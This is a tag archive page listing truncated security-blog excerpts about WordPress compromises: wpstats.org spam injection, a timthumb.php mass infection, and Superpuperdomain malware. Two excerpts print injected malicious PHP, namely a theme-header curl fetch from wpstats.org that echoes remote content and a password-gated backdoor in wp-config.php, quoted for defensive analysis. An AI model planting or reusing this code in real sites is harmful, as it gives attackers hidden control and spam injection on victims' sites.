exec | DataProtectionCenter.com

Wpstats. org Spam and a Fake Advanced Search Plugin

09

May

2012

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site: if(function_exists(‘curl_init’)) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo […]

Category Security Written by Sucuri 0 Comments

Timthumb.php Mass Infection – Aftermath – Part I

28

Oct

2011

If you use WordPress you’re probably aware of the mass infection caused by a vulnerability in the timthumb.php script, a photo manipulation script included in many themes and plugins. Sites were compromised with anything from malware to Blackhat SEO spam, to .htaccess redirections. It would be useful to gain metrics based on the amount of […]

Category Security Written by Sucuri 0 Comments

Update to the Superpuperdomain2.com malware

15

Aug

2011

Just a quick update to the Superpuperdomain2.com/Superpuperdomain.com malware infection that has been affecting thousands of WordPress sites with the vulnerable timthumb.php script. You can read more about it here: http://blog.sucuri.net/2011/08/wordpress-sites-hacked-with-superpuperdomain2-com.html But now the attackers are also adding the following code to the wp-config.php of the hacked sites: if (isset($_GET[‘pingnow’])&& isset($_GET[‘pass’])){ if ($_GET[‘pass’] == ’66f041e16a60928b05a7e228a89c3799′){ if […]

Category Security Written by Sucuri 0 Comments

The Latest in IT Security

Posts Tagged ‘exec’

Wpstats. org Spam and a Fake Advanced Search Plugin

Timthumb.php Mass Infection – Aftermath – Part I

Update to the Superpuperdomain2.com malware

Categories

Featured

Archives

Latest Comments

About Us

Contact Us